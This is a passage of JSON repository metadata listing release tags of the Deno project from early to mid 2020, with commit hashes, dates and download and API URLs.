ps://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.3